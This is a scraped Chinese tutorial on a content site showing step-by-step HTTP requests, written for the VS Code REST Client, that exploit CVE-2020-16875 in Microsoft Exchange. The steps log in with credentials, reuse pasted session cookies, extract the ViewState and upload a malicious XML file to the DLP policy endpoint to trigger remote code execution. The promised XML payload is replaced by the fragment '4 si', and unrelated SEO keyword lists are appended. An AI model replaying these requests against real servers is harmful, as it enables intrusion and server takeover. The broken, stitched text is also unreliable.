怎么使用vscode rest client分析CVE-2020-16875漏洞
发表于:2025-02-01 作者:千家信息网编辑
千家信息网最后更新 2025年02月01日,这篇文章主要介绍"怎么使用vscode rest client分析CVE-2020-16875漏洞",在日常操作中,相信很多人在怎么使用vscode rest client分析CVE-2020-168
千家信息网最后更新 2025年02月01日怎么使用vscode rest client分析CVE-2020-16875漏洞
这篇文章主要介绍"怎么使用vscode rest client分析CVE-2020-16875漏洞",在日常操作中,相信很多人在怎么使用vscode rest client分析CVE-2020-16875漏洞问题上存在疑惑,小编查阅了各式资料,整理出简单好用的操作方法,希望对大家解答"怎么使用vscode rest client分析CVE-2020-16875漏洞"的疑惑有所帮助!接下来,请跟着小编一起来学习吧!
定义几个变量
@target=target@username=info2002@password=123456abc
第一步, 登录验证,主要是获取用户的授权cookie,
## 触发RCE 的一个前提,是需要有一个可以登录的账号密码。## 登录成功,返回一个 302 跳转,Location 地址为 https://{{target}}/owa## 自己拷贝返回的cookie,留着下一步使用POST https://{{target}}/owa/auth.owaContent-Type: application/x-www-form-urlencodeddestination=https://{{target}}/owa&flags=&username={{username}}&password={{password}}&forcedownlevel=0&passwordText=&isUtf8=1
第二步,获取viewstate 信息
### 注意添加 cookie 信息,cookie 来自上一步的返回### POST 返回一个提交DLP策略的页面,其中包含一个 上传xml 页面的表单。### RCE 触发的关键,也是上传一个构建好的xml### 搜索 __VIEWSTATE 表单,找到后边的value备用POST https://{{target}}/ecp/DLPPolicy/ManagePolicyFromISV.aspxCookie: cadata=PNFf9JJYWv0YzkoX5j6QkPv8joj1HGPxf+y5Qv8HuWCTH0aU8z3dCjjan55k8a6PCKn5EdyZJODa2xaVXd26v0ctAWb9M6HR00K0ox5G0bc=; path=/; secure; HttpOnly,cadataTTL=d6qg8liD1i8O8eDQG6dihg==; path=/; secure; HttpOnly,cadataKey=f7uGUtHEafk0woO1GxggVfWuqzLNXJCa51DcVRzzJLYXKByQJubmtzx3WDGrKoLOQyDVt11c4EtBYIQHPXojnLulHRU8fdqoZLCQoPQm6hlxS3XxKBVwZlXMig1UpRCufLLVpvKuVPVdcl54H2mOB0mqlyryTIETcvBP5Amf/3f1abY3De72kva9VSY6m/ETgnjAxA8XpXyipaYBTG87Rq9OZGszXeIxNGAZ6ZA7wfzEQ0BvG+pVFqeYxhXnm3BnYo+6JGuV5X3+kR1hjyLK12AzDR+3fdkOar0xTwkON6fp44PxcqxHMhCDAtCHCD1NEv8wlJzcE8ze614rV+q8zQ==; path=/; secure; HttpOnly,cadataIV=ctnfcTb/AroSCXjUeyq7OYe2GvlksJYDTlmVv6ushP0ai+6/EtfwnaP2imYOhylwIAI1uhh+YFVNghyNaZ51P6w3RCPAJ+RzpUC+AhsxKVs1A9YL8U64hyMe6LkKz/1QqQG+AMot/DYKpqOw3LKnVXsyxJ7XA84G7NjGPQRu4/TQ/e3BaJgSp3QSfnRjQJ9nkbeIKN/iz/vT3nwLw5MIhueTVb3qvXP2YdEJ7JQcEnSuHN/ggwA5AkXzxDClj/DKntFx7f8DduYhQ+SAAOz0QAs4eu954PIVVJiAvb+PMvqJWbCx2/f7prO6u8nyjJz+j3poOV+EmdtFy77DjAB/w==; path=/; secure; HttpOnly,cadataSig=pkEzUP6+8+ugbBpiNxji+eTVagD/JROaWaKO+e3Nsszri6f+xM7eI5oiOGU637ENE8HgW65EKWIyqwjagSIo60PF0mLvSLKGAKCbhlVU7zX0cVlBeYYBidQhnxYV8KflCBJIL9MbDQ9emwH/HdOBS48JJALybzZ/nIiQeIfJsz0ycQS2DUrUCj2qHqDeXDnqrzGNpDtdeNoe0ADc2zm/bKl59N9YgQkYNuz1OArknrhmj/H0FwDUiEB38cg4I+ckZypvVJwMX1V5rG3Csml7BVgMWaDbo6PP9RYALLF28IxhQ62tDgkXn8ltGcdlo7hdWvGvjEfH1I0s5CuT7qwnEw==; path=/; secure; HttpOnly
第三步,触发RCE (不建议执行)
### 同理 cookie 信息,不能丢。 拿着第二步的 viewstate 信息构建恶意的xml,完成RCE.### 不建议执行这一步 ,触发你能确保你的服务器的环境不受影响。### 基本上到第二步就已经可以确认会包含RCE 漏洞了。POST https://{{target}}/ecp/DLPPolicy/ManagePolicyFromISV.aspxCookie: cadata=PNFf9JJYWv0YzkoX5j6QkPv8joj1HGPxf+y5Qv8HuWCTH0aU8z3dCjjan55k8a6PCKn5EdyZJODa2xaVXd26v0ctAWb9M6HR00K0ox5G0bc=; path=/; secure; HttpOnly,cadataTTL=d6qg8liD1i8O8eDQG6dihg==; path=/; secure; HttpOnly,cadataKey=f7uGUtHEafk0woO1GxggVfWuqzLNXJCa51DcVRzzJLYXKByQJubmtzx3WDGrKoLOQyDVt11c4EtBYIQHPXojnLulHRU8fdqoZLCQoPQm6hlxS3XxKBVwZlXMig1UpRCufLLVpvKuVPVdcl54H2mOB0mqlyryTIETcvBP5Amf/3f1abY3De72kva9VSY6m/ETgnjAxA8XpXyipaYBTG87Rq9OZGszXeIxNGAZ6ZA7wfzEQ0BvG+pVFqeYxhXnm3BnYo+6JGuV5X3+kR1hjyLK12AzDR+3fdkOar0xTwkON6fp44PxcqxHMhCDAtCHCD1NEv8wlJzcE8ze614rV+q8zQ==; path=/; secure; HttpOnly,cadataIV=ctnfcTb/AroSCXjUeyq7OYe2GvlksJYDTlmVv6ushP0ai+6/EtfwnaP2imYOhylwIAI1uhh+YFVNghyNaZ51P6w3RCPAJ+RzpUC+AhsxKVs1A9YL8U64hyMe6LkKz/1QqQG+AMot/DYKpqOw3LKnVXsyxJ7XA84G7NjGPQRu4/TQ/e3BaJgSp3QSfnRjQJ9nkbeIKN/iz/vT3nwLw5MIhueTVb3qvXP2YdEJ7JQcEnSuHN/ggwA5AkXzxDClj/DKntFx7f8DduYhQ+SAAOz0QAs4eu954PIVVJiAvb+PMvqJWbCx2/f7prO6u8nyjJz+j3poOV+EmdtFy77DjAB/w==; path=/; secure; HttpOnly,cadataSig=pkEzUP6+8+ugbBpiNxji+eTVagD/JROaWaKO+e3Nsszri6f+xM7eI5oiOGU637ENE8HgW65EKWIyqwjagSIo60PF0mLvSLKGAKCbhlVU7zX0cVlBeYYBidQhnxYV8KflCBJIL9MbDQ9emwH/HdOBS48JJALybzZ/nIiQeIfJsz0ycQS2DUrUCj2qHqDeXDnqrzGNpDtdeNoe0ADc2zm/bKl59N9YgQkYNuz1OArknrhmj/H0FwDUiEB38cg4I+ckZypvVJwMX1V5rG3Csml7BVgMWaDbo6PP9RYALLF28IxhQ62tDgkXn8ltGcdlo7hdWvGvjEfH1I0s5CuT7qwnEw==; path=/; secure; HttpOnlyContent-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW------WebKitFormBoundary7MA4YWxkTrZu0gWContent-Disposition: form-data; name="ctl00$ResultPanePlaceHolder$senderBtn"ResultPanePlaceHolder_ButtonsPanel_btnNext------WebKitFormBoundary7MA4YWxkTrZu0gWContent-Disposition: form-data; name="__VIEWSTATE"/wEPDwUILTg5MDAzMDFkZKEgV4rq2832c5ZF38whYPpaizHg------WebKitFormBoundary7MA4YWxkTrZu0gWContent-Disposition: form-data; name="ctl00$ResultPanePlaceHolder$contentContainer$name"anytexthere------WebKitFormBoundary7MA4YWxkTrZu0gWContent-Disposition: form-data; name="ctl00$ResultPanePlaceHolder$contentContainer$upldCtrl"; filename="rce.xml"Content-Type:< ./rce.xml------WebKitFormBoundary7MA4YWxkTrZu0gW--
贴上一个构造好的XML
4 si
到此,关于"怎么使用vscode rest client分析CVE-2020-16875漏洞"的学习就结束了,希望能够解决大家的疑惑。理论与实践的搭配能更好的帮助大家学习,快去试试吧!若想继续学习更多相关知识,请继续关注网站,小编会继续努力为大家带来更多实用的文章!
漏洞
分析
信息
学习
登录
建议
更多
表单
页面
帮助
实用
成功
接下来
关键
前提
变量
地址
密码
恶意
拷贝
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
潍坊嵌入式软件开发工程师
服务器插内存条的位置
软件开发技术学习网站
网络技术教师面试
机架式服务器竖放使用
服务器怎么选择机柜
网络安全法是一地
软件开发 面试考察
数据库用代码删除字段名称
动态防御的政务网络安全防护
cs有关闭服务器的吗
服务器上怎么建用户
erp系统 数据库架构
华为云服务器回收了能找回吗
如何设置服务器开机自动启动
厦门域名邮箱的服务器需要购买么
wpf 数据库操作
数据库模型图的工具
香港服务器恒创科技信赖
网络技术的发展是接近真相
双色球密码数据库
网络游戏服务器长什么样子
360模型软件开发
商业专利数据库
h2 存储数据库
网络安全设备visio
我的世界开局管理员服务器
iis服务器中添加应用程序
plc的数据存入数据库
量化传播数据库